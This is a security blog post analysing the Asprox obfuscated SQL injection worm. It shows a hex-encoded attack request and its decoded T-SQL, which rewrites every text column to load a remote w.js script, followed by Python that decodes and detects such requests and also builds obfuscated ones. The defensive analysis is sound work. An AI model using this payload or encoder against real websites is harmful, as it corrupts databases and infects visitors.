Security Street Knowledge
  • Obfuscated SQL Injection

    Take a look at this paragraph. Can you read what it says? All the letters have been jumbled (mixed); only the first and last letter of each word is in the right place:

    Unisg the icndeblire pweor of the hmuan mnid, aocdcrnig to rseecrah at Cmabrigde Uinervtisy, it dseno’t mttaer in waht oderr the lterets in a wrod are, the olny irpoamtnt tihng is taht the frsit and lsat ltteer be in the rhgit pclae. An atactk can be a taotl mses but you can dceode it and sitll raed it whoutit a pboerlm. Take the extra step to raed the mnid of a hcaekr.

    ————————————

    Unfortunately, cyber security attacks are rarely as easy to read as the example above. Attackers know that we are getting better at identifying their web-based attacks, so in recent times they have begun obfuscating their malicious payloads. The obfuscated payloads are crafted to slip past a web application firewall (WAF) signature, or simply to make it harder for a trained eye to recognise what is, underneath, a simple SQL injection attack.

    Now take a look at one of the more common obfuscated SQL injection attacks, described as an “ASCII HEX Encoded/Binary String Automated SQL Injection Attack”. It is an example of a new and growing trend of SQL web worms: the real T-SQL is hidden inside a hex literal, and the only keywords visible in the request are DECLARE, SET, CAST and EXEC.


    ASCII HEX Encoded/Binary String

    GET SomeParameter/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452040542076617263686172283235352
9 2C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D313636C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

    Two things to notice. Only spaces are URL-encoded (%20); the quote that breaks out of the original query, the semicolons and the parentheses are sent as-is. And the hex literal as reproduced here is incomplete: a stretch in the middle (roughly from OPEN Table_Cursor to the first </title>) is missing and an odd nibble is left behind, so this copy will not decode cleanly on its own. The deobfuscated version further down shows the full payload.

    ASCII HEX Encoded/Binary String Automated SQL Injection Attack

    1. Once EXEC(@S) runs, the payload walks every text column (xtype 99, 35, 231 and 167, i.e. ntext, text, nvarchar and varchar) of every user table and appends a <script> tag pointing at a malicious JavaScript file called w.js (see the decoded payload below). Every page that renders that data now carries the tag, so the website itself infects its visitors.

    2. w.js is not a virus itself, but it downloads a malicious binary onto the visitor's machine.

    3. All the attacker then has to do is steer visitors to the infected website, through further embedded IFRAMEs and XSS scripts on other sites.

    4. The initial redirect can come from regular visitors of a site they assume is trusted, or from a link distributed as a sales advertisement in an e-mail.


    Deobfuscated – Asprox SQL Injection Worm (decoded using Burp Suite; the decoded text is shown in place of the hex literal)

    DECLARE @S CHAR(4000);SET @S=CAST(0xDECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.SomeBadSite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.SomeBadSite.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S);

    Read it from the inside out: the cursor enumerates every (table, column) pair whose column type is a text type, and for each one runs a dynamic UPDATE that appends a closing </title>, the script tag and an HTML comment opener to every row, skipping rows that already contain the tag. The double single quotes are T-SQL escaping inside the exec('...') string, which is why the payload survives the double encoding.
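Doing the Burp decode step programmatically, and using the result for detection, as an added example that is not part of the original post: the Python below URL-decodes a request line, pulls the hex literal out of CAST(0x... AS CHAR(n)), turns it back into T-SQL, and reports what the payload would write into the database. As a generalisation beyond the page, it also handles the NVARCHAR form, where the hex is UTF-16LE rather than one byte per character. The request it analyses is constructed here from a shortened copy of the decoded worm above with the same placeholder domain; the function names, the /page.asp?id=1 path and the naive keyword rule (standing in for a WAF signature applied to the visible request text) are my assumptions, not anything from the original attack or tooling.

```python
import re
from urllib.parse import unquote

# The worm hides its real T-SQL in a hex literal: CAST(0x<hex> AS CHAR(n)), then EXEC(@S).
# For CHAR/VARCHAR the hex is one byte per character; for NVARCHAR it is UTF-16LE.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC_RE = re.compile(r'<script\s+src\s*=\s*"([^"]+)"', re.IGNORECASE)
# Keyword rule of the kind a WAF might apply to the visible request text (assumed, for contrast).
NAIVE_SIGNATURES = ("<script", "update ", "syscolumns", "xp_cmdshell")


def decode_cast_hex(hexdigits: str, sql_type: str) -> str:
    """Turn the hex literal from CAST(0x... AS <sql_type>) back into T-SQL text."""
    if len(hexdigits) % 2:            # tolerate an odd nibble count from a truncated log line
        hexdigits = "0" + hexdigits
    raw = bytes.fromhex(hexdigits)
    if sql_type.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")   # NVARCHAR: two bytes per character
    return raw.decode("latin-1")                            # CHAR: one byte per character


def deobfuscate(request_line: str) -> list:
    """Decoded T-SQL for every CAST(0x...) literal in the URL-decoded request line."""
    return [decode_cast_hex(h, t) for h, t in CAST_RE.findall(unquote(request_line))]


def naive_waf_hit(request_line: str) -> bool:
    """Keyword matching on the URL-decoded request only: the hex literal hides every keyword."""
    visible = unquote(request_line).lower()
    return any(sig in visible for sig in NAIVE_SIGNATURES)


def analyse(request_line: str) -> dict:
    """Decode first, then look for the worm's behaviour in the decoded T-SQL."""
    visible = unquote(request_line)
    payloads = deobfuscate(request_line)
    sql = " ".join(payloads)
    indicators = {
        # a hex literal handed to EXEC(): the wrapper the worm always uses
        "hex_cast_exec": bool(payloads) and re.search(r"EXEC\s*\(", visible, re.I) is not None,
        # cursor over sysobjects/syscolumns: enumerating every text column of every user table
        "cursor_over_syscolumns": "syscolumns" in sql.lower(),
        # dynamic UPDATE of a column whose name is only known at run time
        "mass_update": re.search(r"update\s*\[", sql, re.I) is not None,
    }
    return {
        "malicious": any(indicators.values()),
        "indicators": indicators,
        "injected_scripts": sorted(set(SCRIPT_SRC_RE.findall(sql))),
        "decoded_sql": payloads,
    }


# Constructed sample (not captured traffic): a shortened copy of the decoded worm above,
# keeping the cursor, the dynamic UPDATE and the NOT LIKE guard that stops re-infection.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and "
    "(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=''\"></title>"
    "<script src=\"http://www0.SomeBadSite.cn/csrss/w.js\"></script><!--''+['+@C+'] "
    "where '+@C+' not like ''%\"></title>"
    "<script src=\"http://www0.SomeBadSite.cn/csrss/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def obfuscate(inner_sql: str, nvarchar: bool = False) -> str:
    """Build a request line in the worm's shape, to feed the decoder (constructed input)."""
    if nvarchar:
        cast = "CAST(0x" + inner_sql.encode("utf-16-le").hex().upper() + " AS NVARCHAR(4000))"
        wrapper = "';DECLARE @S NVARCHAR(4000);SET @S=" + cast + ";EXEC(@S);"
    else:
        cast = "CAST(0x" + inner_sql.encode("latin-1").hex().upper() + " AS CHAR(4000))"
        wrapper = "';DECLARE @S CHAR(4000);SET @S=" + cast + ";EXEC(@S);"
    # only spaces are URL-encoded, as in the request above; /page.asp?id=1 is a placeholder
    return "GET /page.asp?id=1" + wrapper.replace(" ", "%20") + " HTTP/1.1"


if __name__ == "__main__":
    request = obfuscate(INNER_SQL)
    print("keyword rule on visible text fires:", naive_waf_hit(request))
    report = analyse(request)
    print("malicious:", report["malicious"], report["indicators"])
    print("script tag(s) written to the database:", report["injected_scripts"])
    print("decoded T-SQL:", report["decoded_sql"][0][:110] + " ...")
```

The contrast is the point of the page: naive_waf_hit() returns False for the obfuscated request because none of the keywords it looks for exist in the visible text, while analyse() decodes the literal first and then finds the syscolumns cursor, the dynamic UPDATE and the script URL. Any rule that wants to catch this family has to either decode CAST(0x...) literals before matching or treat the DECLARE/SET/CAST/EXEC wrapper itself as the signature.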


    Note: “SQL injection attacks enable malicious users to execute commands or store content in the application’s database.”
